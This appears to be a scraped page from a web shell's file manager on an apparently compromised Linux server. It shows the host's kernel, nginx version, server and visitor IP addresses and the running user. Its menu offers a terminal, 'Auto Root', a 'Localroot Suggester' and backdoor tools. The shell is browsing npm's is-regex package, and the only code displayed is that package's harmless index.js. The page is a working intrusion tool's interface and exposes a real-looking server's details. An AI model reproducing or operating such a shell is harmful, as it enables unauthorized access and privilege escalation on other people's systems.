Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.15.22.62
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
node_modules /
npm /
node_modules /
is-regex /
Delete
Unzip
Name
Size
Permission
Date
Action
.jscs.json
4.04
KB
-rw-r--r--
2022-01-10 12:20
.npmignore
97
B
-rw-r--r--
2022-01-10 12:20
.travis.yml
4.66
KB
-rw-r--r--
2022-01-10 12:20
CHANGELOG.md
1.08
KB
-rw-r--r--
2022-01-10 12:20
LICENSE
1.06
KB
-rw-r--r--
2022-01-10 12:20
Makefile
3.74
KB
-rw-r--r--
2022-01-10 12:20
README.md
1.59
KB
-rw-r--r--
2022-01-10 12:20
index.js
918
B
-rw-r--r--
2022-01-10 12:20
package.json
1.79
KB
-rw-r--r--
2022-01-10 12:20
test.js
1.76
KB
-rw-r--r--
2022-01-10 12:20
Save
Rename
'use strict'; var has = require('has'); var regexExec = RegExp.prototype.exec; var gOPD = Object.getOwnPropertyDescriptor; var tryRegexExecCall = function tryRegexExec(value) { try { var lastIndex = value.lastIndex; value.lastIndex = 0; regexExec.call(value); return true; } catch (e) { return false; } finally { value.lastIndex = lastIndex; } }; var toStr = Object.prototype.toString; var regexClass = '[object RegExp]'; var hasToStringTag = typeof Symbol === 'function' && typeof Symbol.toStringTag === 'symbol'; module.exports = function isRegex(value) { if (!value || typeof value !== 'object') { return false; } if (!hasToStringTag) { return toStr.call(value) === regexClass; } var descriptor = gOPD(value, 'lastIndex'); var hasLastIndexDataProperty = descriptor && has(descriptor, 'value'); if (!hasLastIndexDataProperty) { return false; } return tryRegexExecCall(value); };